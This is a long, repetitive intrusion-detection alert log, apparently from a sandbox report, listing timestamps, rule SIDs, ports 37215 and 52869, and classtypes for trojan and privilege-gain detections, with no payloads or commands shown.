                      Timestamp:07/20/24-23:01:07.054782
                      SID:2829579
                      Source Port:46900
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.389834
                      SID:2027339
                      Source Port:58038
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.148144
                      SID:2835222
                      Source Port:60312
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.636703
                      SID:2027339
                      Source Port:37804
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.728463
                      SID:2027339
                      Source Port:52602
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.919931
                      SID:2027339
                      Source Port:32798
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.684130
                      SID:2027339
                      Source Port:44022
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.978984
                      SID:2027339
                      Source Port:56542
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.915268
                      SID:2835222
                      Source Port:40924
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.043842
                      SID:2829579
                      Source Port:51620
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.181097
                      SID:2027339
                      Source Port:34490
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.097857
                      SID:2829579
                      Source Port:55782
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.571946
                      SID:2027339
                      Source Port:46826
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:04.208558
                      SID:2027339
                      Source Port:55192
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.360712
                      SID:2025132
                      Source Port:37410
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:52.609463
                      SID:2027339
                      Source Port:57762
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.082683
                      SID:2025132
                      Source Port:49892
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.042815
                      SID:2027339
                      Source Port:54570
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.639012
                      SID:2835222
                      Source Port:35120
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.312614
                      SID:2027339
                      Source Port:49448
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.353271
                      SID:2831300
                      Source Port:59452
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:25.509340
                      SID:2027339
                      Source Port:56156
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.058922
                      SID:2835222
                      Source Port:42978
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.085856
                      SID:2025132
                      Source Port:56566
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.929013
                      SID:2829579
                      Source Port:50676
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.526897
                      SID:2025132
                      Source Port:48868
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.085956
                      SID:2027339
                      Source Port:57422
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.098909
                      SID:2835222
                      Source Port:36510
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.446628
                      SID:2027339
                      Source Port:58682
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.637859
                      SID:2027339
                      Source Port:39736
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.709583
                      SID:2831300
                      Source Port:48606
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:11.632393
                      SID:2835222
                      Source Port:51772
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.749865
                      SID:2025132
                      Source Port:33484
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:05.636717
                      SID:2025132
                      Source Port:34174
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.144672
                      SID:2835222
                      Source Port:60704
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.971718
                      SID:2025132
                      Source Port:52574
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:10.031806
                      SID:2025132
                      Source Port:43076
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.259207
                      SID:2027339
                      Source Port:55498
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.637960
                      SID:2831300
                      Source Port:55360
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.145997
                      SID:2027339
                      Source Port:58762
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:00.413915
                      SID:2027339
                      Source Port:38334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.159489
                      SID:2027339
                      Source Port:52240
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:26.010869
                      SID:2025132
                      Source Port:55142
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:02.632381
                      SID:2831300
                      Source Port:43208
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:57.222128
                      SID:2829579
                      Source Port:38764
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.701127
                      SID:2027339
                      Source Port:52112
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.131339
                      SID:2835222
                      Source Port:43742
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.607816
                      SID:2027339
                      Source Port:48736
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.118165
                      SID:2835222
                      Source Port:39384
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.139692
                      SID:2027339
                      Source Port:58250
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.387026
                      SID:2027339
                      Source Port:34730
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.915268
                      SID:2835222
                      Source Port:42074
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.575344
                      SID:2025132
                      Source Port:48332
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.157619
                      SID:2829579
                      Source Port:41878
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.854322
                      SID:2027339
                      Source Port:46292
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.216693
                      SID:2831300
                      Source Port:60934
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:00.633295
                      SID:2835222
                      Source Port:37926
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:53.715694
                      SID:2025132
                      Source Port:33080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:14.013039
                      SID:2829579
                      Source Port:46716
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.904266
                      SID:2025132
                      Source Port:35818
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:51.086033
                      SID:2831300
                      Source Port:59968
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.209629
                      SID:2027339
                      Source Port:55768
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.560530
                      SID:2831300
                      Source Port:43976
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:03.975418
                      SID:2835222
                      Source Port:41700
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.016889
                      SID:2835222
                      Source Port:40534
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.856443
                      SID:2831300
                      Source Port:44526
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:06.988055
                      SID:2835222
                      Source Port:51074
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.952782
                      SID:2829579
                      Source Port:55492
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.622289
                      SID:2027339
                      Source Port:42376
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.520254
                      SID:2027339
                      Source Port:59858
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.141970
                      SID:2025132
                      Source Port:56970
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.340763
                      SID:2025132
                      Source Port:40722
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.607816
                      SID:2831300
                      Source Port:33276
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.467111
                      SID:2025132
                      Source Port:55928
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.033190
                      SID:2027339
                      Source Port:48642
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.248064
                      SID:2027339
                      Source Port:51126
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.757934
                      SID:2025132
                      Source Port:47594
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.392527
                      SID:2027339
                      Source Port:56686
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.893328
                      SID:2831300
                      Source Port:47168
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:56.270914
                      SID:2025132
                      Source Port:54396
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.187171
                      SID:2025132
                      Source Port:59650
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:57.221646
                      SID:2835222
                      Source Port:57502
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.816521
                      SID:2835222
                      Source Port:52566
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.257796
                      SID:2027339
                      Source Port:39230
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.828807
                      SID:2831300
                      Source Port:46608
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:12.807585
                      SID:2831300
                      Source Port:42662
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:14.100332
                      SID:2835222
                      Source Port:46206
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.288927
                      SID:2025132
                      Source Port:51686
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:55.428221
                      SID:2025132
                      Source Port:55450
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.329969
                      SID:2027339
                      Source Port:59718
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.260197
                      SID:2025132
                      Source Port:42514
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:34.048825
                      SID:2835222
                      Source Port:56284
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.199976
                      SID:2027339
                      Source Port:48278
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.260197
                      SID:2025132
                      Source Port:45464
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.066908
                      SID:2829579
                      Source Port:45804
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.945747
                      SID:2025132
                      Source Port:44964
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:00.634292
                      SID:2829579
                      Source Port:51864
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.374418
                      SID:2025132
                      Source Port:58308
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:59.163619
                      SID:2829579
                      Source Port:43154
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.602081
                      SID:2025132
                      Source Port:52140
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.812448
                      SID:2025132
                      Source Port:52854
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.582150
                      SID:2027339
                      Source Port:60208
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.938688
                      SID:2025132
                      Source Port:44104
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:13.277683
                      SID:2831300
                      Source Port:52292
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.634900
                      SID:2831300
                      Source Port:54028
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:00.512136
                      SID:2027339
                      Source Port:59352
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:00.552327
                      SID:2027339
                      Source Port:56838
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.410893
                      SID:2027339
                      Source Port:47218
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.069870
                      SID:2027339
                      Source Port:33706
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.262556
                      SID:2027339
                      Source Port:39514
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.047411
                      SID:2829579
                      Source Port:45312
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.490827
                      SID:2831300
                      Source Port:51232
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:51.130270
                      SID:2025132
                      Source Port:51168
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:00.638418
                      SID:2829579
                      Source Port:40104
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.059312
                      SID:2829579
                      Source Port:54822
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.633642
                      SID:2835222
                      Source Port:35680
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.946379
                      SID:2027339
                      Source Port:46328
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:32.028836
                      SID:2835222
                      Source Port:48510
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.990535
                      SID:2835222
                      Source Port:45656
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.059312
                      SID:2835222
                      Source Port:50708
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.294677
                      SID:2829579
                      Source Port:48012
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.423677
                      SID:2027339
                      Source Port:58000
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.732773
                      SID:2025132
                      Source Port:53080
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.889163
                      SID:2835222
                      Source Port:55552
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.881853
                      SID:2025132
                      Source Port:41344
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:03.219817
                      SID:2025132
                      Source Port:34482
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:27.666100
                      SID:2835222
                      Source Port:56836
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.295391
                      SID:2027339
                      Source Port:48558
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.219232
                      SID:2025132
                      Source Port:58748
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:11.630769
                      SID:2829579
                      Source Port:57592
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.066373
                      SID:2835222
                      Source Port:37724
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.007032
                      SID:2831300
                      Source Port:60640
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:48.356835
                      SID:2027339
                      Source Port:34734
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.144672
                      SID:2829579
                      Source Port:45890
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.033766
                      SID:2829579
                      Source Port:60624
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.140632
                      SID:2829579
                      Source Port:43374
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.063335
                      SID:2027339
                      Source Port:51140
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.582150
                      SID:2027339
                      Source Port:50930
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.072139
                      SID:2831300
                      Source Port:56536
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.878385
                      SID:2027339
                      Source Port:50708
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.574617
                      SID:2027339
                      Source Port:45580
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.707284
                      SID:2027339
                      Source Port:55918
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.786028
                      SID:2027339
                      Source Port:38260
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.556921
                      SID:2831300
                      Source Port:50918
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.808678
                      SID:2025132
                      Source Port:51954
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:51.358348
                      SID:2027339
                      Source Port:57654
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.816521
                      SID:2835222
                      Source Port:33148
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.944341
                      SID:2831300
                      Source Port:51422
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:43.160906
                      SID:2027339
                      Source Port:34986
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.038268
                      SID:2025132
                      Source Port:51568
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.443693
                      SID:2027339
                      Source Port:48548
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.140869
                      SID:2025132
                      Source Port:59542
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.976795
                      SID:2829579
                      Source Port:39016
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.471349
                      SID:2027339
                      Source Port:42752
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.320408
                      SID:2829579
                      Source Port:57214
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.991548
                      SID:2835222
                      Source Port:49102
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.708151
                      SID:2835222
                      Source Port:54590
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.406953
                      SID:2027339
                      Source Port:43978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.642449
                      SID:2835222
                      Source Port:54306
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.175742
                      SID:2829579
                      Source Port:39616
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.425638
                      SID:2831300
                      Source Port:59232
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.347676
                      SID:2027339
                      Source Port:46104
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.486619
                      SID:2025132
                      Source Port:43862
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:00.634089
                      SID:2829579
                      Source Port:38216
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.612377
                      SID:2831300
                      Source Port:60004
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:14.296756
                      SID:2829579
                      Source Port:45326
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.593003
                      SID:2831300
                      Source Port:33050
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.977603
                      SID:2835222
                      Source Port:58014
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.310207
                      SID:2829579
                      Source Port:33310
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.378788+0200
                      SID:2835222
                      Source Port:35138
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.240985+0200
                      SID:2027339
                      Source Port:46470
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.181164+0200
                      SID:2835222
                      Source Port:44702
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.543930+0200
                      SID:2835222
                      Source Port:52740
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.005202+0200
                      SID:2027339
                      Source Port:50400
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.107414+0200
                      SID:2027339
                      Source Port:59236
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:02.108705+0200
                      SID:2835222
                      Source Port:44728
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.658630+0200
                      SID:2835222
                      Source Port:40708
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.867575+0200
                      SID:2027339
                      Source Port:59266
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:09.030401+0200
                      SID:2027339
                      Source Port:33440
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.847594+0200
                      SID:2027339
                      Source Port:40048
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
